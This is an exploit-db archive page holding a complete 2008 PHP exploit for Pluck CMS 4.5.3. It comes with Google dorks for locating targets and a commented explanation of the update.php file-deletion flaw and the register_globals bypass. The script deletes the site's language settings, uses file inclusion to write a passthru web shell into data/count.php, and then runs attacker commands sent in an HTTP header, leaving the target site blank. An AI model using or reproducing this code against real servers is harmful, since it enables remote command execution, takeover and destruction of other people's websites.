Lucene search

K
exploitdbNine:Situations:GroupEDB-ID:6492
HistorySep 19, 2008 - 12:00 a.m.

Pluck CMS 4.5.3 - 'update.php' Remote File Corruption

2008-09-1900:00:00
Nine:Situations:Group
www.exploit-db.com
45

AI Score

7.4

Confidence

Low

<?php
        /*

         Pluck 4.5.3 update.php remote file corruption exploit
         by Nine:Situations:Group::bookoo
         our site: http://retrogod.altervista.org/
   
         Google dorks: "powered by pluck" +admin 
                       inurl:file=kop1.php
                       inurl:file=kop2.php
                       ...
                  
         Exploit condition : register_globals = on
         Note(!): regardless of php.ini settings, this code will turn your host in a blank page ...


         Vulnerability:
         this program carries a dangerous update.php script. If reachable
         in the main folder, you can delete the files with language and theme preferences:

         ...
         $step = $_GET['step'];
         ...

         ...
         elseif($step == "3") {

         echo "Rearranging files for compatibility with pluck 4.5...<br>";

         copy("data/title.dat", "data/settings/title.dat");

         unlink("data/settings/install.dat");
         copy("data/install.dat", "data/settings/install.dat");

         copy("data/options.php", "data/settings/options.php");

         copy("data/pass.php", "data/settings/pass.php");

         unlink("data/settings/langpref.php");
         copy("data/inc/lang/langpref.php", "data/settings/langpref.php");

         unlink("data/settings/themepref.php");
         copy("data/inc/themes/themepref.php", "data/settings/themepref.php");
         ...

         see the unlink() calls... the subsequent copy() has no results if you
         don't place the source files there...

         Now look at index.php, lines 21-26:
         
         ...
         //Include security-enhancements
         include ("data/inc/security.php");
         //Include Translation data
         include ("data/settings/langpref.php");
         include ("data/inc/lang/en.php");
         include ("data/inc/lang/$langpref");
         ...

         The script now fails to include the langpref.php script and "langpref" variable is not initialized then,
         ***if register_globals=on*** you can include arbitraty files from local resources.
        
         This check in security.php doesn't work as expected :
         ... 
         //Register Globals
         //If Register Globals are ON, unset injected variables
         if(isset($_REQUEST)) {
	   foreach ($_REQUEST as $key => $value) { 
		if(isset($GLOBALS[$key])) {
			unset($GLOBALS[$key]); 
		    }
	      }
         }
         ...
         ex: http://host/path/index.php?GLOBALS[langpref]=1

         It unsets the "GLOBALS" key from the GLOBALS[] array, while langpref variable remains
         overwritten...

         You can include the /data/inc/page_editmeta.php script which contains a nice php injection:

         ...
         if(isset($_POST['Submit'])) {
         $data = "data/content/$editmeta";
         include("data/inc/page_stripslashes.php");
         $file = fopen($data, "w");  
         fputs($file, "<?php 
         \$title = \"$title\";
         \$content = \"$content\";
         \$contactinc = \"$contactinc\";
         \$hidden = \"$hidden\";
         \$description = \"$cont1\";
         \$keywords = \"$sleutel\";
         \$copyright = \"$copyr\";");
         //Check if we also need to include albums
         if ($incalbum) {
         foreach ($incalbum as $name => $value) {
         fputs($file, "\n\$incalbum['$name'] = \"yes\";");
         } }
         //Check if we also need to include blogs
         if ($incblog) {
         foreach ($incblog as $name => $value) {
         fputs($file, "\n\$incblog['$name'] = \"yes\";");
         } }
         fputs($file, "\n ?>");
         fclose($file); 
         ...

         also this check in /data/inc/page_editmeta.php is unuseful because
         you call it from the main script:
         
         ...
         //Make sure the file isn't accessed directly
         if((!ereg("index.php", $_SERVER['SCRIPT_FILENAME'])) && (!ereg("admin.php", $_SERVER['SCRIPT_FILENAME'])) && (!ereg("install.php", $_SERVER['SCRIPT_FILENAME'])) && (!ereg("login.php", $_SERVER['SCRIPT_FILENAME']))){
         //Give out an "access denied" error
         echo "access denied";
         //Block all other code
         exit();
         }
         ...

         We choose the /data/count.php to inject a php shell then you can launch commands on the target server.
                
         
        */

        $cmd = "uname";//change here
        
        error_reporting(7);
        $host=$argv[1];
        $path=$argv[2];
        $argv[3] ? $port = (int) $argv[3] : $port = 80;
        $argv[2] ? print("attackin'...\n") : die ("syntax: php ".$argv[0]." [host] [path] [[port]]");

        $win = (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') ? true : false;
        $win ? dl("php_curl.dll") : dl("php_curl.so");

        $url = "http://$host:$port";
     
        function send($url,$header)
        {
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_URL,$url);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($ch, CURLOPT_TIMEOUT, 0);
            curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $header);

            $data = curl_exec($ch); if (curl_errno($ch)) {
            print curl_error($ch)."\n";
            } else {
               curl_close($ch);
            }
            sleep(1);
            return $data."\n";
            
        }

        $agent = "Mozilla</b>/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)";

        $header ="GET ".$path."update.php?step=3 HTTP/1.0\r\n";
        $header.="Host: $host\r\nUser-Agent: $agent\r\nConnection: Close\r\n\r\n";
        send($url,$header);

        //oh, how evil... tested and working against PHP 5.2.4
        $header ="POST ".$path."index.php HTTP/1.0\r\n";
        $header.="Host: $host\r\nUser-Agent: $agent\r\n";
        $header.="Content-Type: application/x-www-form-urlencoded\r\n";
        $header.="Content-Length: 218\r\n";
        $header.="Connection: Close\r\n\r\n";
        $header.="Submit=1&GLOBALS[langpref]=../page_editmeta.php&GLOBALS[editmeta]=../count.php&GLOBALS[sleutel]=\$x{\$y{error_reporting(0)}}\$x{\$y{set_time_limit(0)}}\$x{\$y{print(my_flag)}}\$x{\$y{passthru(\$_SERVER[HTTP_CMD])}}\$x{\$y{die()}}";
        send($url,$header);

        $header ="GET ".$path."data/count.php HTTP/1.0\r\n";
        $header.="Host: $host\r\nUser-Agent: $agent\r\n";
        $header.="CMD: $cmd\r\n";
        $header.="Connection: Close\r\n\r\n";
        $out=send($url,$header);
        $out=explode("my_flag",$out);
        count($out)==2 ? print("exploit succeeded...\n$out[1]") : print("exploit failed... :(\n");
?>

# milw0rm.com [2008-09-19]

AI Score

7.4

Confidence

Low